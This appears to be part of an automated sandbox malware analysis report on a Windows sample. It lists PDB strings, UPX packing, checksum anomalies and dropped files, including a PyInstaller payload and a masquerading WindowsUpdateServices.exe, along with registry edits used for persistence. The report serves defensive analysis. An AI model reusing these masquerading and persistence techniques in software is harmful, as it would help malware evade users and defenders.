                        Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: DE5A.exe, 00000016.00000002.2474470989.00007FFE115A1000.00000040.00000001.01000000.00000019.sdmp
                        Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2402440948.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2465108618.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2400126816.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2461133186.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2403595756.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2465829275.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: DE5A.exe, 00000016.00000002.2469647177.00007FFDFB279000.00000040.00000001.01000000.0000001A.sdmp
                        Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: DE5A.exe, 00000015.00000003.2397605685.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000016.00000002.2479674945.00007FFE1A533000.00000002.00000001.01000000.00000010.sdmp, DE5A.exe, 00000027.00000003.2457880872.000001FEA7813000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 0000002E.00000002.2595982386.00007FFE11573000.00000002.00000001.01000000.00000020.sdmp
                        Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2401603005.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2464007360.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-heap-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2399657698.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2460572839.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2401138877.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2463261633.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-crt-math-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2403192503.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2465288220.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-handle-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2399541989.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2460460068.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2400503433.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2461614650.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2399105753.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2460002090.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: DE5A.exe, 00000016.00000002.2474040580.00007FFE11581000.00000040.00000001.01000000.0000001C.sdmp, DE5A.exe, 0000002E.00000002.2596230418.00007FFE11581000.00000040.00000001.01000000.0000002C.sdmp
                        Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2399228016.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2460126912.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-synch-l1-2-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2401237563.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2463409848.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-crt-process-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2403306598.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2465418399.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2401906192.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2464449776.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-util-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2401603005.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2464007360.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2398865544.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2459784606.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: DE5A.exe, 00000016.00000002.2477389116.00007FFE1A49E000.00000040.00000001.01000000.00000014.sdmp
                        Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2399105753.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2460002090.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: ucrtbase.pdbUGP source: DE5A.exe, 00000016.00000002.2473628005.00007FFE00521000.00000002.00000001.01000000.0000000E.sdmp, DE5A.exe, 0000002E.00000002.2593349908.00007FFDFF1F1000.00000002.00000001.01000000.0000001E.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: DE5A.exe, 00000016.00000002.2474846626.00007FFE11BB1000.00000040.00000001.01000000.00000017.sdmp
                        Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2403595756.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2465829275.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2401906192.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2464449776.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\libcrypto-3.pdb| source: DE5A.exe, 00000016.00000002.2469647177.00007FFDFB311000.00000040.00000001.01000000.0000001A.sdmp
                        Source: Binary string: D:\a\1\b\libssl-3.pdbDD source: DE5A.exe, 00000016.00000002.2471761427.00007FFDFF2C4000.00000040.00000001.01000000.0000001B.sdmp, DE5A.exe, 0000002E.00000002.2594679915.00007FFE00524000.00000040.00000001.01000000.0000002B.sdmp
                        Source: Binary string: api-ms-win-core-file-l1-2-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2399325096.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2460226793.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-profile-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2400772483.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2462415733.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2398865544.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2459784606.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2401722785.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2464273860.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: DE5A.exe, DE5A.exe, 00000016.00000002.2472172339.00007FFDFFE91000.00000040.00000001.01000000.00000016.sdmp
                        Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2403192503.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2465288220.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\libcrypto-3.pdb source: DE5A.exe, DE5A.exe, 00000016.00000002.2469647177.00007FFDFB311000.00000040.00000001.01000000.0000001A.sdmp
                        Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2399777885.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2460682343.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2402440948.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2465108618.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2403984086.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2466348879.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2401474807.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2463811905.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2401013743.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2462996367.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: DE5A.exe, 00000015.00000003.2399448628.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2460344804.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WA source: DE5A.exe
                        Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: DE5A.exe, 00000016.00000002.2477766609.00007FFE1A4CC000.00000040.00000001.01000000.00000013.sdmp, DE5A.exe, 0000002E.00000002.2599019605.00007FFE1A52C000.00000040.00000001.01000000.00000023.sdmp
                        Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: DE5A.exe, 00000015.00000003.2399908877.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2460830926.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: DE5A.exe, 00000016.00000002.2475545585.00007FFE1A451000.00000040.00000001.01000000.0000001D.sdmp, DE5A.exe, 0000002E.00000002.2597768086.00007FFE1A451000.00000040.00000001.01000000.0000002D.sdmp
                        Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2400256199.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2461293936.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2403438900.0000025F9EED6000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2465611078.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdbGCTL source: DE5A.exe, 00000015.00000003.2400644859.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2461857558.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: DE5A.exe, 00000016.00000002.2475199806.00007FFE11BD1000.00000040.00000001.01000000.00000015.sdmp
                        Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdbGCTL source: DE5A.exe, 00000015.00000003.2401722785.0000025F9EEDD000.00000004.00000020.00020000.00000000.sdmp, DE5A.exe, 00000027.00000003.2464273860.000001FEA7814000.00000004.00000020.00020000.00000000.sdmp
                        Source: api-ms-win-core-console-l1-1-0.dll.21.drStatic PE information: 0x975A648E [Sun Jun 19 20:33:18 2050 UTC]
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 10_2_00995FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,10_2_00995FC8
                        Source: libssl-3.dll.21.drStatic PE information: real checksum: 0x0 should be: 0x3a250
                        Source: _lzma.pyd.39.drStatic PE information: real checksum: 0x0 should be: 0x258b9
                        Source: sqlite3.dll.21.drStatic PE information: real checksum: 0x0 should be: 0xacaad
                        Source: python312.dll.39.drStatic PE information: real checksum: 0x0 should be: 0x1c80ff
                        Source: _ssl.pyd.21.drStatic PE information: real checksum: 0x0 should be: 0x1764c
                        Source: libffi-8.dll.39.drStatic PE information: real checksum: 0x0 should be: 0xa1d1
                        Source: _hashlib.pyd.39.drStatic PE information: real checksum: 0x0 should be: 0xfa67
                        Source: Og1SeeXcB2.exeStatic PE information: real checksum: 0x0 should be: 0xcc7e2
                        Source: _queue.pyd.39.drStatic PE information: real checksum: 0x0 should be: 0xef88
                        Source: _sqlite3.pyd.21.drStatic PE information: real checksum: 0x0 should be: 0x19009
                        Source: _socket.pyd.39.drStatic PE information: real checksum: 0x0 should be: 0xd03a
                        Source: _decimal.pyd.39.drStatic PE information: real checksum: 0x0 should be: 0x25e84
                        Source: _bz2.pyd.39.drStatic PE information: real checksum: 0x0 should be: 0xdc77
                        Source: unicodedata.pyd.21.drStatic PE information: real checksum: 0x0 should be: 0x521f3
                        Source: libcrypto-3.dll.39.drStatic PE information: real checksum: 0x0 should be: 0x19efbf
                        Source: select.pyd.21.drStatic PE information: real checksum: 0x0 should be: 0x7bd2
                        Source: _ctypes.pyd.21.drStatic PE information: real checksum: 0x0 should be: 0x1d595
                        Source: _ctypes.pyd.39.drStatic PE information: real checksum: 0x0 should be: 0x1d595
                        Source: python312.dll.21.drStatic PE information: real checksum: 0x0 should be: 0x1c80ff
                        Source: _sqlite3.pyd.39.drStatic PE information: real checksum: 0x0 should be: 0x19009
                        Source: WindowsUpdateServices.exe.61.drStatic PE information: real checksum: 0x0 should be: 0x7e63a
                        Source: libffi-8.dll.21.drStatic PE information: real checksum: 0x0 should be: 0xa1d1
                        Source: _lzma.pyd.21.drStatic PE information: real checksum: 0x0 should be: 0x258b9
                        Source: sqlite3.dll.39.drStatic PE information: real checksum: 0x0 should be: 0xacaad
                        Source: _queue.pyd.21.drStatic PE information: real checksum: 0x0 should be: 0xef88
                        Source: _socket.pyd.21.drStatic PE information: real checksum: 0x0 should be: 0xd03a
                        Source: _decimal.pyd.21.drStatic PE information: real checksum: 0x0 should be: 0x25e84
                        Source: libcrypto-3.dll.21.drStatic PE information: real checksum: 0x0 should be: 0x19efbf
                        Source: _ssl.pyd.39.drStatic PE information: real checksum: 0x0 should be: 0x1764c
                        Source: select.pyd.39.drStatic PE information: real checksum: 0x0 should be: 0x7bd2
                        Source: DE5A.exe.18.drStatic PE information: real checksum: 0x87c310 should be: 0x87a527
                        Source: libssl-3.dll.39.drStatic PE information: real checksum: 0x0 should be: 0x3a250
                        Source: _hashlib.pyd.21.drStatic PE information: real checksum: 0x0 should be: 0xfa67
                        Source: unicodedata.pyd.39.drStatic PE information: real checksum: 0x0 should be: 0x521f3
                        Source: _bz2.pyd.21.drStatic PE information: real checksum: 0x0 should be: 0xdc77
                        Source: DE5A.exe.18.drStatic PE information: section name: _RDATA
                        Source: libffi-8.dll.21.drStatic PE information: section name: UPX2
                        Source: VCRUNTIME140.dll.21.drStatic PE information: section name: fothk
                        Source: VCRUNTIME140.dll.21.drStatic PE information: section name: _RDATA
                        Source: libffi-8.dll.39.drStatic PE information: section name: UPX2
                        Source: VCRUNTIME140.dll.39.drStatic PE information: section name: fothk
                        Source: VCRUNTIME140.dll.39.drStatic PE information: section name: _RDATA
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 10_2_009B0DE6 push ecx; ret 10_2_009B0DF9
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 13_2_009B0DE6 push ecx; ret 13_2_009B0DF9
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 13_2_009AD145 push esp; retf 0003h13_2_009AD146
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifCode function: 15_2_004032AC push eax; ret 15_2_004032C2
                        Source: C:\Users\user\AppData\Roaming\wsruwiiCode function: 20_2_00190315 push cs; retn 0018h20_2_00190318
                        Source: C:\Users\user\AppData\Roaming\wsruwiiCode function: 20_2_00160DE6 push ecx; ret 20_2_00160DF9
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeCode function: 22_2_00007FFDFF264021 push rcx; ret 22_2_00007FFDFF264022
                        Source: initial sampleStatic PE information: section name: UPX0
                        Source: initial sampleStatic PE information: section name: UPX1
                        Source: initial sampleStatic PE information: section name: UPX0
                        Source: initial sampleStatic PE information: section name: UPX1
                        Source: initial sampleStatic PE information: section name: UPX0
                        Source: initial sampleStatic PE information: section name: UPX1
                        Source: initial sampleStatic PE information: section name: UPX0
                        Source: initial sampleStatic PE information: section name: UPX1
                        Source: initial sampleStatic PE information: section name: UPX0
                        Source: initial sampleStatic PE information: section name: UPX1
                        Source: initial sampleStatic PE information: section name: UPX0
                        Source: initial sampleStatic PE information: section name: UPX1
                        Source: initial sampleStatic PE information: section name: UPX0
                        Source: initial sampleStatic PE information: section name: UPX1
                        Source: initial sampleStatic PE information: section name: UPX0
                        Source: initial sampleStatic PE information: section name: UPX1
                        Source: initial sampleStatic PE information: section name: UPX0
                        Source: initial sampleStatic PE information: section name: UPX1
                        Source: initial sampleStatic PE information: section name: UPX0
                        Source: initial sampleStatic PE information: section name: UPX1
                        Source: initial sampleStatic PE information: section name: UPX0
                        Source: initial sampleStatic PE information: section name: UPX1
                        Source: initial sampleStatic PE information: section name: UPX0
                        Source: initial sampleStatic PE information: section name: UPX1
                        Source: initial sampleStatic PE information: section name: UPX0
                        Source: initial sampleStatic PE information: section name: UPX1
                        Source: initial sampleStatic PE information: section name: UPX0
                        Source: initial sampleStatic PE information: section name: UPX1
                        Source: initial sampleStatic PE information: section name: UPX0
                        Source: initial sampleStatic PE information: section name: UPX1
                        Source: initial sampleStatic PE information: section name: UPX0
                        Source: initial sampleStatic PE information: section name: UPX1
                        Source: initial sampleStatic PE information: section name: UPX0
                        Source: initial sampleStatic PE information: section name: UPX1
                        Source: initial sampleStatic PE information: section name: UPX0
                        Source: initial sampleStatic PE information: section name: UPX1
                        Source: initial sampleStatic PE information: section name: UPX0
                        Source: initial sampleStatic PE information: section name: UPX1
                        Source: initial sampleStatic PE information: section name: UPX0
                        Source: initial sampleStatic PE information: section name: UPX1
                        Source: initial sampleStatic PE information: section name: UPX0
                        Source: initial sampleStatic PE information: section name: UPX1
                        Source: initial sampleStatic PE information: section name: UPX0
                        Source: initial sampleStatic PE information: section name: UPX1
                        Source: initial sampleStatic PE information: section name: UPX0
                        Source: initial sampleStatic PE information: section name: UPX1
                        Source: initial sampleStatic PE information: section name: UPX0
                        Source: initial sampleStatic PE information: section name: UPX1
                        Source: initial sampleStatic PE information: section name: UPX0
                        Source: initial sampleStatic PE information: section name: UPX1
                        Source: initial sampleStatic PE information: section name: UPX0
                        Source: initial sampleStatic PE information: section name: UPX1
                        Source: initial sampleStatic PE information: section name: UPX0
                        Source: initial sampleStatic PE information: section name: UPX1
                        Source: initial sampleStatic PE information: section name: UPX0
                        Source: initial sampleStatic PE information: section name: UPX1
                        Source: initial sampleStatic PE information: section name: UPX0
                        Source: initial sampleStatic PE information: section name: UPX1
                        Source: initial sampleStatic PE information: section name: UPX0
                        Source: initial sampleStatic PE information: section name: UPX1
                        Source: initial sampleStatic PE information: section name: UPX0
                        Source: initial sampleStatic PE information: section name: UPX1
                        Source: initial sampleStatic PE information: section name: UPX0
                        Source: initial sampleStatic PE information: section name: UPX1

                        Persistence and Installation Behavior

                        barindex
                        Drops PE files with a suspicious file extension
                        Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifJump to dropped file
                        Found pyInstaller with non standard icon
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeProcess created: "C:\Users\user\AppData\Local\Temp\DE5A.exe"
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeProcess created: C:\Users\user\AppData\Local\Temp\DE5A.exe
                        Uses cmd line tools excessively to alter registry or file data
                        Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
                        Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\bound.exeFile created: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI35882\_bz2.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-string-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI35882\libffi-8.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI35882\ucrtbase.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-file-l1-2-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-core-file-l1-2-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43482\libssl-3.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI35882\_ctypes.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43482\python312.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43482\_bz2.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI35882\VCRUNTIME140.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43482\_ssl.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43482\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43482\_ctypes.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI35882\_ssl.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
                        Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\wsruwiiJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI43482\select.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI35882\python312.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI35882\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
